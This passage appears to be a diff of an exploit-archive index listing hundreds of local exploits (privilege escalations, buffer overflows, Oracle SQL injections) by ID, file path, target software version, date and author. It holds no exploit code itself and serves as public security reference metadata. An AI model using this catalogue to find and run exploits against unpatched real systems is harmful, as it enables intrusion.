+2580,exploits/osx/local/2580.pl,"Xcode OpenBase 9.1.5 (OSX) - Root File Create Privilege Escalation",2006-10-16,"Kevin Finisterre",local,osx, +2581,exploits/linux/local/2581.c,"Nvidia Graphics Driver 8774 - Local Buffer Overflow",2006-10-16,"Rapid7 Security",local,linux, +2633,exploits/hp-ux/local/2633.c,"HP-UX 11i - 'swpackage' Local Stack Overflow / Privilege Escalation",2006-10-24,prdelka,local,hp-ux, +2634,exploits/hp-ux/local/2634.c,"HP-UX 11i - 'swmodify' Local Stack Overflow / Privilege Escalation",2006-10-24,prdelka,local,hp-ux, +2635,exploits/hp-ux/local/2635.c,"HP-UX 11i - 'swask' Format String Privilege Escalation",2006-10-24,prdelka,local,hp-ux, +2636,exploits/hp-ux/local/2636.c,"HP-UX 11i - 'LIBC TZ' Enviroment Variable Privilege Escalation",2006-10-24,prdelka,local,hp-ux, +2641,exploits/solaris/local/2641.sh,"Solaris 10 libnspr - 'Constructor' Arbitrary File Creation Privilege Escalation (3)",2006-10-24,"Marco Ivaldi",local,solaris, +2676,exploits/windows/local/2676.cpp,"Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Overflow / Privilege Escalation",2006-10-29,Nanika,local,windows, +2737,exploits/osx/local/2737.pl,"Xcode OpenBase 10.0.0 (OSX) - Symlink Privilege Escalation",2006-11-08,"Kevin Finisterre",local,osx, +2738,exploits/osx/local/2738.pl,"Xcode OpenBase 10.0.0 (OSX) - Unsafe System Call Privilege Escalation",2006-11-08,"Kevin Finisterre",local,osx, +2788,exploits/osx/local/2788.pl,"Kerio WebSTAR 5.4.2 (OSX) - 'libucache.dylib' Local Privilege Escalation",2006-11-15,"Kevin Finisterre",local,osx, +40380,exploits/win_x86-64/local/40380.py,"PrivateTunnel Client 2.7.0 (x64) - Local Credentials Disclosure",2016-09-14,"Yakir Wizman",local,win_x86-64, +2815,exploits/windows/local/2815.c,"XMPlay 3.3.0.4 - '.M3U' Filename Local Buffer Overflow",2006-11-20,"Greg Linares",local,windows, +2821,exploits/windows/local/2821.c,"XMPlay 3.3.0.4 - '.PLS' Local Buffer Overflow",2006-11-21,"Greg Linares",local,windows, +2824,exploits/windows/local/2824.c,"XMPlay 3.3.0.4 - '.ASX' Filename Local Buffer Overflow",2006-11-21,"Greg Linares",local,windows, +2872,exploits/windows/local/2872.c,"VUPlayer 2.44 - '.m3u' UNC Name Buffer Overflow",2006-11-30,Expanders,local,windows, +2873,exploits/windows/local/2873.c,"AtomixMP3 < 2.3 - '.m3u' Local Buffer Overflow",2006-11-30,"Greg Linares",local,windows, +2880,exploits/windows/local/2880.c,"BlazeVideo HDTV Player 2.1 - '.PLF' Local Buffer Overflow (PoC)",2006-12-01,"Greg Linares",local,windows, +2950,exploits/windows/local/2950.c,"AstonSoft DeepBurner 1.8.0 - '.dbr' File Parsing Buffer Overflow",2006-12-19,Expanders,local,windows, +3024,exploits/windows/local/3024.c,"Microsoft Windows - NtRaiseHardError 'Csrss.exe' Memory Disclosure",2006-12-27,"Ruben Santamarta",local,windows, +3070,exploits/osx/local/3070.pl,"VideoLAN VLC Media Player 0.8.6 (x86) - 'udp://' Format String",2007-01-02,MoAB,local,osx, +3071,exploits/windows/local/3071.c,"Microsoft Vista - 'NtRaiseHardError' Local Privilege Escalation",2007-01-03,erasmus,local,windows, +3087,exploits/osx/local/3087.rb,"Apple Mac OSX 10.4.8 - DiskManagement BOM Privilege Escalation",2007-01-05,MoAB,local,osx, +3088,exploits/osx/local/3088.rb,"Apple Mac OSX 10.4.8 - DiskManagement BOM 'cron' Local Privilege Escalation",2007-01-05,MoAB,local,osx, +3094,exploits/bsd/local/3094.c,"OpenBSD 3.x < 4.0 - 'vga_ioctl()' Local Privilege Escalation",2007-01-07,"Critical Security",local,bsd, +3102,exploits/osx/local/3102.rb,"Application Enhancer (APE) 2.0.2 - Local Privilege Escalation",2007-01-08,MoAB,local,osx, +3131,exploits/windows/local/3131.c,"Kaspersky AntiVirus 6.0 - Local Privilege Escalation",2007-01-15,MaD,local,windows, +3149,exploits/windows/local/3149.cpp,"Microsoft Help Workshop 4.03.0002 - '.cnt' Local Buffer Overflow",2007-01-17,porkythepig,local,windows, +3154,exploits/linux/local/3154.c,"GNU/Linux mbse-bbs 0.70.0 - Local Buffer Overflow",2007-01-18,prdelka,local,linux, +3156,exploits/osx/local/3156.rb,"Rumpus 5.1 - Local Privilege Escalation / Remote FTP LIST (PoC)",2007-01-19,MoAB,local,osx, +3159,exploits/windows/local/3159.cpp,"Microsoft Help Workshop 4.03.0002 - '.HPJ' Local Buffer Overflow",2007-01-19,porkythepig,local,windows, +3173,exploits/osx/local/3173.rb,"Apple Mac OSX 10.4.8 - System Preferences Privilege Escalation",2007-01-21,MoAB,local,osx, +3176,exploits/windows/local/3176.cpp,"Microsoft Visual C++ - '.RC Resource Files' Local Buffer Overflow",2007-01-22,porkythepig,local,windows, +3177,exploits/multiple/local/3177.txt,"Oracle 10g - SYS.DBMS_CDC_IMPDP.BUMP_SEQUENCE PL / SQL Injection",2007-01-23,"Joxean Koret",local,multiple, +3178,exploits/multiple/local/3178.txt,"Oracle 10g - SYS.KUPW$WORKER.MAIN PL / SQL Injection",2007-01-23,"Joxean Koret",local,multiple, +3179,exploits/multiple/local/3179.txt,"Oracle 10g - SYS.KUPV$FT.ATTACH_JOB PL / SQL Injection",2007-01-23,"Joxean Koret",local,multiple, +3181,exploits/osx/local/3181.rb,"Apple Mac OSX 10.4.8 - 'UserNotificationCenter' Local Privilege Escalation",2007-01-23,MoAB,local,osx, +3213,exploits/linux/local/3213.c,"Trend Micro VirusWall 3.81 - 'vscan/VSAPI' Local Buffer Overflow",2007-01-28,"Sebastian Wolfgarten",local,linux, +3219,exploits/osx/local/3219.rb,"Apple Mac OSX 10.4.8 (8L2127) - 'crashdump' Local Privilege Escalation",2007-01-29,MoAB,local,osx, +3220,exploits/windows/local/3220.c,"Multiple Printer Providers (Spooler Service) - Local Privilege Escalation",2007-01-29,"Andres Tarasco",local,windows, +3260,exploits/windows/local/3260.txt,"Microsoft Word 2000 - Code Execution",2007-02-03,xCuter,local,windows, +3273,exploits/tru64/local/3273.ksh,"HP Tru64 Alpha OSF1 5.1 - 'ps' Information Leak",2007-02-06,bunker,local,tru64, +3330,exploits/linux/local/3330.pl,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (1)",2007-02-18,Revenge,local,linux, +3333,exploits/linux/local/3333.pl,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (2)",2007-02-19,Revenge,local,linux, +3342,exploits/windows/local/3342.c,"News Rover 12.1 Rev 1 - Remote Stack Overflow (1)",2007-02-20,Marsu,local,windows, +3349,exploits/windows/local/3349.c,"News Bin Pro 5.33 - '.nbi' Local Buffer Overflow",2007-02-21,Marsu,local,windows, +3356,exploits/linux/local/3356.sh,"Nortel SSL VPN Linux Client 6.0.3 - Local Privilege Escalation",2007-02-21,"Jon Hart",local,linux, +3369,exploits/windows/local/3369.pl,"News Rover 12.1 Rev 1 - Remote Stack Overflow (2)",2007-02-24,"Umesh Wanve",local,windows, +3383,exploits/plan9/local/3383.c,"Plan 9 Kernel - 'devenv.c OTRUNC/pwrite' Local Privilege Escalation",2007-02-28,"Don Bailey",local,plan9, +3384,exploits/linux/local/3384.c,"Apache 1.3.34/1.3.33 (Ubuntu / Debian) - CGI TTY Privilege Escalation",2007-02-28,"Kristian Hermansen",local,linux, +3386,exploits/osx/local/3386.pl,"McAfee VirusScan for Mac (Virex) 7.7 - Local Privilege Escalation",2007-02-28,"Kevin Finisterre",local,osx, +3413,exploits/multiple/local/3413.php,"PHP < 4.4.5/5.2.1 - PHP_binary Session Deserialization Information Leak",2007-03-04,"Stefan Esser",local,multiple, +3414,exploits/multiple/local/3414.php,"PHP < 4.4.5/5.2.1 - WDDX Session Deserialization Information Leak",2007-03-04,"Stefan Esser",local,multiple, +3417,exploits/windows/local/3417.php,"PHP 4.4.6 - 'mssql_[p]connect()' Local Buffer Overflow",2007-03-05,rgod,local,windows, +3424,exploits/multiple/local/3424.php,"PHP 5.2.1 - 'substr_compare()' Information Leak",2007-03-07,"Stefan Esser",local,multiple, +3426,exploits/linux/local/3426.php,"PHP < 4.4.5/5.2.1 - 'shmop' Local Code Execution",2007-03-07,"Stefan Esser",local,linux, +3427,exploits/linux/local/3427.php,"PHP < 4.4.5/5.2.1 - 'shmop' SSL RSA Private-Key Disclosure",2007-03-07,"Stefan Esser",local,linux, +3429,exploits/windows/local/3429.php,"PHP 'COM' Extensions - inconsistent Win32 'safe_mode' Bypass",2007-03-07,anonymous,local,windows, +3431,exploits/windows/local/3431.php,"PHP 4.4.6 - 'crack_opendict()' Local Buffer Overflow (PoC)",2007-03-08,rgod,local,windows, +3439,exploits/windows/local/3439.php,"PHP 4.4.6 - 'snmpget()' Object id Local Buffer Overflow (PoC)",2007-03-09,rgod,local,windows, +3440,exploits/linux/local/3440.php,"PHP 5.2.0 / PHP with PECL ZIP 1.8.3 - 'zip://' URL Wrapper Buffer Overflow",2007-03-09,"Stefan Esser",local,linux, +3442,exploits/multiple/local/3442.php,"PHP 4.4.6 - 'cpdf_open()' Local Source Code Disclosure (PoC)",2007-03-09,rgod,local,multiple, +3451,exploits/win_x86/local/3451.c,"Oracle 10g (Windows x86) - 'PROCESS_DUP_HANDLE' Local Privilege Escalation",2007-03-10,"Cesar Cerrudo",local,win_x86, +3460,exploits/osx/local/3460.php,"PHP 5.2.0 (OSX) - EXT/Filter Space Trimming Buffer Underflow",2007-03-12,"Stefan Esser",local,osx, +3479,exploits/linux/local/3479.php,"PHP 5.2.1 - 'session_regenerate_id()' Double-Free",2007-03-14,"Stefan Esser",local,linux, +3480,exploits/linux/local/3480.php,"PHP 5.2.0/5.2.1 - Rejected Session ID Double-Free",2007-03-14,"Stefan Esser",local,linux, +3488,exploits/windows/local/3488.php,"PHP 4.4.6 - 'ibase_connect()' Local Buffer Overflow",2007-03-15,rgod,local,windows, +3499,exploits/linux/local/3499.php,"PHP 4.4.6/5.2.1 - 'array_user_key_compare()' ZVAL dtor Local Overflow",2007-03-16,"Stefan Esser",local,linux, +3517,exploits/osx/local/3517.php,"PHP 5.2.0 (OSX) - 'header()' Space Trimming Buffer Underflow",2007-03-19,"Stefan Esser",local,osx, +3525,exploits/linux/local/3525.php,"PHP 4.4.6/5.2.1 - ext/gd Already Freed Resources Usage",2007-03-20,"Stefan Esser",local,linux, +3529,exploits/linux/local/3529.php,"PHP 5.2.1 - 'hash_update_file()' Freed Resource Usage",2007-03-20,"Stefan Esser",local,linux, +3559,exploits/multiple/local/3559.php,"PHP 5.2.1 - 'Unserialize()' Local Information Leak",2007-03-23,"Stefan Esser",local,multiple, +3571,exploits/linux/local/3571.php,"PHP < 4.4.5/5.2.1 - '_SESSION unset()' Local Overflow",2007-03-25,"Stefan Esser",local,linux, +3572,exploits/linux/local/3572.php,"PHP < 4.4.5/5.2.1 - '_SESSION' Deserialization Overwrite",2007-03-25,"Stefan Esser",local,linux, +3576,exploits/windows/local/3576.php,"PHP 5.2.1 with PECL PHPDOC - Local Buffer Overflow",2007-03-25,rgod,local,windows, +3578,exploits/bsd/local/3578.c,"FreeBSD mcweject 0.9 'Eject' - Local Buffer Overflow / Privilege Escalation",2007-03-26,harry,local,bsd, +3587,exploits/linux/local/3587.c,"Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (1)",2007-03-27,"Robert Swiecki",local,linux, +3593,exploits/windows/local/3593.c,"Corel WordPerfect X3 13.0.0.565 - '.prs' Local Buffer Overflow",2007-03-28,"Jonathan So",local,windows, +3595,exploits/linux/local/3595.c,"Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (2)",2007-03-28,"Robert Swiecki",local,linux, +3617,exploits/windows/local/3617.cpp,"Microsoft Windows - Animated Cursor '.ani' Local Stack Overflow",2007-03-31,devcode,local,windows, +3647,exploits/windows/local/3647.c,"Microsoft Windows - Animated Cursor '.ani' Local Buffer Overflow",2007-04-02,Marsu,local,windows, +3648,exploits/windows/local/3648.c,"IrfanView 3.99 - '.ani' Local Buffer Overflow (1)",2007-04-02,Marsu,local,windows, +3649,exploits/windows/local/3649.c,"Ipswitch WS_FTP 5.05 - Server Manager Local Site Buffer Overflow",2007-04-02,Marsu,local,windows, +3652,exploits/windows/local/3652.c,"Microsoft Windows - Animated Cursor '.ani' Local Overflow (Hardware DEP)",2007-04-03,devcode,local,windows, +3664,exploits/windows/local/3664.txt,"TrueCrypt 4.3 - 'setuid' Local Privilege Escalation",2007-04-04,"Marco Ivaldi",local,windows, +3688,exploits/windows/local/3688.c,"Microsoft Windows - GDI Privilege Escalation (MS07-017) (1)",2007-04-08,Ivanlef0u,local,windows, +3692,exploits/windows/local/3692.c,"IrfanView 3.99 - '.ani' Local Buffer Overflow (2)",2007-04-09,"Breno Silva Pinto",local,windows, +3695,exploits/windows/local/3695.c,"Microsoft Windows - Animated Cursor '.ani' Local Overflow",2007-04-09,"Breno Silva Pinto",local,windows, +3727,exploits/windows/local/3727.c,"VCDGear 3.56 Build 050213 - 'FILE' Local Code Execution",2007-04-13,InTeL,local,windows, +3730,exploits/linux/local/3730.txt,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' exec-shield Local Overflow",2007-04-13,Xpl017Elz,local,linux, +3755,exploits/windows/local/3755.c,"Microsoft Windows - GDI Privilege Escalation (MS07-017) (2)",2007-04-17,"Lionel d'Hauenens",local,windows, +3757,exploits/windows/local/3757.txt,"OllyDbg 1.10 - Local Format String",2007-04-17,jamikazu,local,windows, +3772,exploits/windows/local/3772.c,"PhotoFiltre Studio 8.1.1 - '.tif' Local Buffer Overflow",2007-04-21,Marsu,local,windows, +3776,exploits/windows/local/3776.c,"ACDSee 9.0 - '.xpm' Local Buffer Overflow",2007-04-22,Marsu,local,windows, +3777,exploits/windows/local/3777.c,"XnView 1.90.3 - '.xpm' Local Buffer Overflow",2007-04-22,Marsu,local,windows, +3779,exploits/windows/local/3779.c,"Corel Paint Shop Pro Photo 11.20 - '.clp' Local Buffer Overflow",2007-04-23,Marsu,local,windows, +3793,exploits/windows/local/3793.c,"Adobe Photoshop CS2 / CS3 - '.bmp' Local Buffer Overflow",2007-04-24,Marsu,local,windows, +3797,exploits/windows/local/3797.c,"ABC-View Manager 1.42 - '.psp' Local Buffer Overflow",2007-04-25,Marsu,local,windows, +3798,exploits/windows/local/3798.c,"FreshView 7.15 - '.psp' Local Buffer Overflow",2007-04-25,Marsu,local,windows, +3801,exploits/windows/local/3801.c,"GIMP 2.2.14 - '.ras' SUNRAS Plugin Buffer Overflow",2007-04-26,Marsu,local,windows, +3811,exploits/windows/local/3811.c,"IrfanView 4.00 - '.iff' Local Buffer Overflow",2007-04-27,Marsu,local,windows, +3812,exploits/windows/local/3812.c,"Photoshop CS2/CS3 / Paint Shop Pro 11.20 - '.png' Local Buffer Overflow",2007-04-27,Marsu,local,windows, +3823,exploits/windows/local/3823.c,"Winamp 5.34 - '.mp4' Code Execution",2007-04-30,Marsu,local,windows, +3856,exploits/windows/local/3856.html,"East Wind Software - 'advdaudio.ocx 1.5.1.1' Local Buffer Overflow",2007-05-05,shinnai,local,windows, +3888,exploits/win_x86/local/3888.c,"GIMP 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow",2007-05-09,"Kristian Hermansen",local,win_x86, +3897,exploits/windows/local/3897.c,"eTrust AntiVirus Agent r8 - Local Privilege Escalation",2007-05-11,binagres,local,windows, +3912,exploits/win_x86/local/3912.c,"Notepad++ 4.1 (Windows x86) - '.ruby' File Processing Buffer Overflow",2007-05-12,vade79,local,win_x86, +3975,exploits/windows/local/3975.c,"MagicISO 5.4 (build239) - '.cue' File Local Buffer Overflow",2007-05-23,vade79,local,windows, +3985,exploits/osx/local/3985.txt,"Apple Mac OSX 10.4.8 - pppd Plugin Loading Privilege Escalation",2007-05-25,qaaz,local,osx, +4001,exploits/windows/local/4001.cpp,"UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (1)",2007-05-28,n00b,local,windows, +4002,exploits/windows/local/4002.py,"UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (2)",2007-05-28,"Thomas Pollet",local,windows, +4013,exploits/osx/local/4013.txt,"Apple Mac OSX < 2007-005 - 'vpnd' Local Privilege Escalation",2007-05-30,"Kevin Finisterre",local,osx, +4024,exploits/windows/local/4024.rb,"DVD X Player 4.1 Professional - '.PLF' File Buffer Overflow",2007-06-02,n00b,local,windows, +4028,exploits/linux/local/4028.txt,"Screen 4.0.3 (OpenBSD) - Local Authentication Bypass",2008-06-18,Rembrandt,local,linux, +4051,exploits/windows/local/4051.rb,"MoviePlay 4.76 - '.lst' Local Buffer Overflow",2007-06-08,n00b,local,windows, +4080,exploits/windows/local/4080.php,"PHP 5.2.3 'Tidy' Extension - Local Buffer Overflow",2007-06-19,rgod,local,windows, +40465,exploits/linux/local/40465.txt,"Cisco Firepower Threat Management Console 6.0.1 - Hard-Coded MySQL Credentials",2016-10-05,KoreLogic,local,linux, +4165,exploits/windows/local/4165.c,"WinPcap 4.0 - 'NPF.SYS' Local Privilege Escalation (PoC)",2007-07-10,"Mario Ballano Bárcena",local,windows, +4172,exploits/linux/local/4172.c,"Linux Kernel < 2.6.20.2 - 'IPv6_Getsockopt_Sticky' Memory Leak (PoC)",2007-07-10,dreyer,local,linux, +4178,exploits/windows/local/4178.txt,"Symantec AntiVirus - 'symtdi.sys' Local Privilege Escalation",2007-07-12,"Zohiartze Herce",local,windows, +4203,exploits/multiple/local/4203.sql,"Oracle 9i/10g - Evil Views Change Passwords",2007-07-19,bunker,local,multiple, +4204,exploits/windows/local/4204.php,"PHP 5.2.3 - 'snmpget()' Object id Local Buffer Overflow",2007-07-20,shinnai,local,windows, +4218,exploits/windows/local/4218.php,"PHP 5.2.3 - Win32std ext. 'safe_mode' / 'disable_functions' Protections Bypass",2007-07-24,shinnai,local,windows, +4229,exploits/windows/local/4229.pl,"CrystalPlayer 1.98 - '.mls' Local Buffer Overflow",2007-07-26,"Arham Muhammad",local,windows, +4231,exploits/aix/local/4231.c,"IBM AIX 5.3 SP6 - Capture Terminal Sequence Privilege Escalation",2007-07-27,qaaz,local,aix, +4232,exploits/aix/local/4232.sh,"IBM AIX 5.3 SP6 - 'pioout' Arbitrary Library Loading Privilege Escalation",2007-07-27,qaaz,local,aix, +4233,exploits/aix/local/4233.c,"IBM AIX 5.3 SP6 - FTP 'gets()' Local Privilege Escalation",2007-07-27,qaaz,local,aix, +4236,exploits/windows/local/4236.php,"PHP 5.x - 'Win32service' Local 'Safe_Mode()' Bypass",2007-07-27,NetJackal,local,windows, +4252,exploits/windows/local/4252.c,"Live for Speed S1/S2/Demo - '.mpr replay' Local Buffer Overflow",2007-08-01,n00b,local,windows, +4257,exploits/windows/local/4257.c,"Panda AntiVirus 2008 - Local Privilege Escalation",2007-08-05,tarkus,local,windows, +4262,exploits/windows/local/4262.cpp,"Live for Speed S1/S2/Demo - '.ply' Local Buffer Overflow",2007-08-06,n00b,local,windows, +4263,exploits/windows/local/4263.cpp,"Live for Speed S1/S2/Demo - '.spr' Local Buffer Overflow",2007-08-06,n00b,local,windows, +4270,exploits/windows/local/4270.php,"PHP mSQL (msql_connect) - Local Buffer Overflow",2007-08-08,Inphex,local,windows, +4274,exploits/windows/local/4274.php,"PHP 5.2.3 - 'snmpget()' object id Local Buffer Overflow (EDI)",2007-08-09,Inphex,local,windows, +4302,exploits/windows/local/4302.php,"PHP 5.2.3 - 'PHP_win32sti' Local Buffer Overflow (1)",2007-08-22,Inphex,local,windows, +4303,exploits/windows/local/4303.php,"PHP 5.2.3 - 'PHP_win32sti' Local Buffer Overflow (2)",2007-08-22,NetJackal,local,windows, +4311,exploits/windows/local/4311.php,"PHP 'FFI' Extension 5.0.5 - 'Safe_mode' Local Bypass",2007-08-23,NetJackal,local,windows, +4314,exploits/windows/local/4314.php,"PHP 'Perl' Extension - 'Safe_mode' Bypass",2007-08-25,NetJackal,local,windows, +4325,exploits/windows/local/4325.php,"XAMPP for Windows 1.6.3a - Local Privilege Escalation",2007-08-27,Inphex,local,windows, +4345,exploits/windows/local/4345.c,"Norman Virus Control - 'nvcoaft51.sys' ioctl BF672028",2007-08-30,inocraM,local,windows, +4354,exploits/windows/local/4354.py,"Virtual DJ 5.0 - '.m3u' Local Buffer Overflow",2007-09-02,0x58,local,windows, +4355,exploits/windows/local/4355.php,"OtsTurntables 1.00 - '.m3u' Local Buffer Overflow",2007-09-02,0x58,local,windows, +4361,exploits/windows/local/4361.pl,"Microsoft Visual Basic 6.0 - VBP_Open OLE Local CodeExec",2007-09-04,Koshi,local,windows, +4364,exploits/windows/local/4364.php,"AtomixMP3 2.3 - '.pls' Local Buffer Overflow",2007-09-05,0x58,local,windows, +4392,exploits/multiple/local/4392.txt,"PHP 4.4.7/5.2.3 - MySQL/MySQLi 'Safe_Mode' Bypass",2007-09-10,"Mattias Bengtsson",local,multiple, +4431,exploits/windows/local/4431.py,"Microsoft Visual Basic Enterprise 6.0 SP6 - Code Execution",2007-09-19,shinnai,local,windows, +4460,exploits/lin_x86-64/local/4460.c,"Linux Kernel 2.4/2.6 (x86-64) - System Call Emulation Privilege Escalation",2007-09-27,"Robert Swiecki",local,lin_x86-64, +4515,exploits/solaris/local/4515.c,"Solaris 10 (SPARC/x86) - sysinfo Kernel Memory Disclosure",2007-09-01,qaaz,local,solaris, +4516,exploits/solaris/local/4516.c,"Solaris (SPARC/x86) - fifofs I_PEEK Kernel Memory Disclosure",2007-10-10,qaaz,local,solaris, +4517,exploits/windows/local/4517.php,"PHP 5.2.4 'ionCube' Extension - 'safe_mode' / disable_functions Bypass",2007-10-11,shinnai,local,windows, +4531,exploits/windows/local/4531.py,"jetAudio 7.x - '.m3u' Local Overwrite (SEH)",2007-10-14,h07,local,windows, +4553,exploits/windows/local/4553.php,"PHP 5.x - COM functions 'Safe_mode()' / 'disable_function' Bypass",2007-10-22,shinnai,local,windows, +4564,exploits/multiple/local/4564.txt,"Oracle 10g - 'CTX_DOC.MARKUP' SQL Injection",2007-10-23,sh2kerr,local,multiple, +4570,exploits/multiple/local/4570.pl,"Oracle 10g/11g - 'SYS.LT.FINDRICSET' SQL Injection (1)",2007-10-27,bunker,local,multiple, +4571,exploits/multiple/local/4571.pl,"Oracle 10g/11g - 'SYS.LT.FINDRICSET' SQL Injection (2)",2007-10-27,bunker,local,multiple, +4572,exploits/multiple/local/4572.txt,"Oracle 10g - 'LT.FINDRICSET' SQL Injection (IDS Evasion)",2007-10-27,sh2kerr,local,multiple, +4583,exploits/windows/local/4583.py,"Sony CONNECT Player 4.x - '.m3u' Local Stack Overflow",2007-10-29,TaMBaRuS,local,windows, +4584,exploits/windows/local/4584.c,"Kodak Image Viewer - TIF/TIFF Code Execution (PoC) (MS07-055)",2007-10-29,"Gil-Dong / Woo-Chi",local,windows, +4612,exploits/aix/local/4612.py,"IBM AIX 5.3.0 - 'setlocale()' Local Privilege Escalation",2007-11-07,"Thomas Pollet",local,aix, +4625,exploits/windows/local/4625.txt,"Microsoft Jet Engine - '.MDB' File Parsing Stack Overflow (PoC)",2007-11-16,cocoruder,local,windows, +4698,exploits/linux/local/4698.c,"Send ICMP Nasty Garbage (SING) - Append File Logrotate",2007-12-06,bannedit,local,linux, +4701,exploits/windows/local/4701.pl,"Media Player Classic 6.4.9 - '.MP4' File Stack Overflow",2007-12-08,"SYS 49152",local,windows, +4702,exploits/windows/local/4702.pl,"Microsoft Windows Media Player 6.4 - '.MP4' File Stack Overflow (PoC)",2007-12-08,"SYS 49152",local,windows, +4703,exploits/windows/local/4703.pl,"NullSoft Winamp 5.32 - .MP4 Tags Stack Overflow",2007-12-08,"SYS 49152",local,windows, +4749,exploits/windows/local/4749.c,"Rosoft Media Player 4.1.7 - '.m3u' Local Stack Overflow",2007-12-18,devcode,local,windows, +4751,exploits/windows/local/4751.pl,"jetAudio 7.0.5 COWON Media Center MP4 - Local Stack Overflow",2007-12-18,"SYS 49152",local,windows, +4756,exploits/linux/local/4756.c,"Linux Kernel < 2.6.11.5 - BlueTooth Stack Privilege Escalation",2007-12-18,Backdoored,local,linux, +4759,exploits/osx/local/4759.c,"Apple Mac OSX - mount_smbfs Stack Based Buffer Overflow",2007-12-19,"Subreption LLC.",local,osx, +4839,exploits/windows/local/4839.pl,"CoolPlayer 2.17 - '.m3u' Local Stack Overflow",2008-01-05,Trancek,local,windows, +4892,exploits/windows/local/4892.py,"Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow",2008-01-11,shinnai,local,windows, +4938,exploits/windows/local/4938.py,"Microsoft Visual Basic Enterprise 6 SP6 - '.dsr' File Handling Buffer Overflow",2008-01-18,shinnai,local,windows, +4994,exploits/multiple/local/4994.sql,"Oracle 10g R1 - 'pitrig_drop' Get Users Hash / PL/SQL Injection",2008-01-28,sh2kerr,local,multiple, +4995,exploits/multiple/local/4995.sql,"Oracle 10g R1 - 'PITRIG_TRUNCATE' Get Users Hash / PL/SQL Injection",2008-01-28,sh2kerr,local,multiple, +4996,exploits/multiple/local/4996.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg PLSQL Injection (Change Sys Password)",2008-01-28,sh2kerr,local,multiple, +4998,exploits/windows/local/4998.c,"IrfanView 4.10 - '.fpx' Memory Corruption",2008-01-28,Marsu,local,windows, +5004,exploits/windows/local/5004.c,"SafeNet 10.4.0.12 - 'IPSecDrv.sys' Local kernel Ring0 SYSTEM",2008-01-29,mu-b,local,windows, +5032,exploits/windows/local/5032.c,"Total Video Player 1.03 - '.m3u' File Local Buffer Overflow",2008-02-01,"fl0 fl0w",local,windows, +5077,exploits/windows/local/5077.cpp,"Total Video Player 1.20 - '.m3u' File Local Stack Buffer Overflow",2008-02-07,"fl0 fl0w",local,windows, +5092,exploits/linux/local/5092.c,"Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Escalation (2)",2008-02-09,qaaz,local,linux, +5093,exploits/linux/local/5093.c,"Linux Kernel 2.6.23 < 2.6.24 - 'vmsplice' Local Privilege Escalation (1)",2008-02-09,qaaz,local,linux, +5107,exploits/windows/local/5107.c,"Microsoft Office 2003 - '.wps' Local Stack Overflow (MS08-011)",2008-02-13,chujwamwdupe,local,windows, +5141,exploits/windows/local/5141.c,"DESlock+ < 3.2.6 - 'LIST' Local Kernel Memory Leak (PoC)",2008-02-18,mu-b,local,windows, +5143,exploits/windows/local/5143.c,"DESlock+ < 3.2.6 - Local Kernel Ring0 link list zero SYSTEM",2008-02-18,mu-b,local,windows, +5144,exploits/windows/local/5144.c,"DESlock+ < 3.2.6 - 'DLMFDISK.sy's Local kernel Ring0 SYSTEM",2008-02-18,mu-b,local,windows, +5167,exploits/linux/local/5167.sh,"X.Org xorg-x11-xfs 1.0.2-3.1 - Local Race Condition",2008-02-21,vl4dZ,local,linux, +5227,exploits/solaris/local/5227.c,"Solaris 8/9/10 - 'fifofs I_PEEK' Local Kernel Memory Leak",2008-03-10,"Marco Ivaldi",local,solaris, +5250,exploits/windows/local/5250.cpp,"VideoLAN VLC Media Player 0.8.6e - Subtitle Parsing Local Buffer Overflow",2008-03-14,"Mai Xuan Cuong",local,windows, +5287,exploits/windows/local/5287.txt,"Microsoft Excel - Code Execution (MS08-014)",2008-03-21,zha0,local,windows, +5320,exploits/windows/local/5320.txt,"Microsoft Office XP SP3 - '.PPT' File Buffer Overflow (MS08-016)",2008-03-30,Marsu,local,windows, +5346,exploits/windows/local/5346.pl,"XnView 1.92.1 - 'FontName' Slideshow Buffer Overflow",2008-04-02,haluznik,local,windows, +5355,exploits/sco/local/5355.sh,"SCO UnixWare < 7.1.4 p534589 - 'pkgadd' Local Privilege Escalation",2008-04-04,qaaz,local,sco, +5356,exploits/sco/local/5356.c,"SCO UnixWare Reliant HA 1.1.4 - Local Privilege Escalation",2008-04-04,qaaz,local,sco, +5357,exploits/sco/local/5357.c,"SCO UnixWare Merge - 'mcd' Local Privilege Escalation",2008-04-04,qaaz,local,sco, +5424,exploits/linux/local/5424.txt,"AlsaPlayer < 0.99.80-rc3 - Vorbis Input Local Buffer Overflow",2008-04-10,"Albert Sellares",local,linux, +5442,exploits/windows/local/5442.cpp,"Microsoft Windows - GDI Image Parsing Stack Overflow (MS08-021)",2008-04-14,Lamhtz,local,windows, +5462,exploits/windows/local/5462.py,"DivX Player 6.6.0 - '.srt' File Buffer Overflow (SEH)",2008-04-18,muts,local,windows, +5479,exploits/windows/local/5479.txt,"Adobe Album Starter 3.2 - Unchecked Local Buffer Overflow",2008-04-21,c0ntex,local,windows, +5492,exploits/windows/local/5492.cpp,"DivX Player 6.7 - '.srt' File Subtitle Parsing Buffer Overflow",2008-04-24,lhoang8500,local,windows, +5498,exploits/windows/local/5498.py,"Kantaris 0.3.4 - SSA Subtitle Local Buffer Overflow",2008-04-25,j0rgan,local,windows, +5518,exploits/windows/local/5518.txt,"Microsoft Windows XP SP2 - 'win32k.sys' Local Privilege Escalation (MS08-025)",2008-04-28,"Ruben Santamarta",local,windows, +5584,exploits/windows/local/5584.c,"Open Office.org 2.31 - swriter Local Code Execution",2008-05-10,Marsu,local,windows, +5625,exploits/windows/local/5625.c,"Symantec Altiris Client Service 6.8.378 - Local Privilege Escalation",2008-05-15,"Alex Hernandez",local,windows, +5667,exploits/windows/local/5667.py,"VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal",2008-05-23,j0rgan,local,windows, +5837,exploits/windows/local/5837.c,"Deterministic Network Enhancer - 'dne2000.sys' Kernel Ring0 SYSTEM",2008-06-17,mu-b,local,windows, 